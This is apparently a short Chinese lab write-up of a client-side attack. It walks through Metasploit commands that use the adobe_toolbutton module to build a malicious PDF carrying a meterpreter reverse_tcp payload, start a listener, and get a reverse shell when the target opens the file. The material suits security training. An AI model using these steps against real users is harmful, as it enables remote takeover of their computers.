对客户端攻击:adobe_toolbutton

时间:2023-03-08 21:04:20

对客户端攻击:adobe_toolbutton

漏洞简介

  • 远程攻击者可以利用漏洞执行任意指令。当用户打开特定pdf就可以触发payload。

对客户端攻击:adobe_toolbutton

实践过程

  • 输入命令use exploit/windows/fileformat/adobe_toolbutton使用该模块,然后使用set payload windows/meterpreter/reverse_tcp设置回连,show options检查设置信息并补全,最后exploit生成文件,文件在显示的目录下:

对客户端攻击:adobe_toolbutton

  • 建立监听use exploit/multi/handlerset payload windows/meterpreter/reverse_tcp,然后exploit开启监听,同时在靶机点开pdf:

对客户端攻击:adobe_toolbutton

  • 可以看到回连成功

相关文章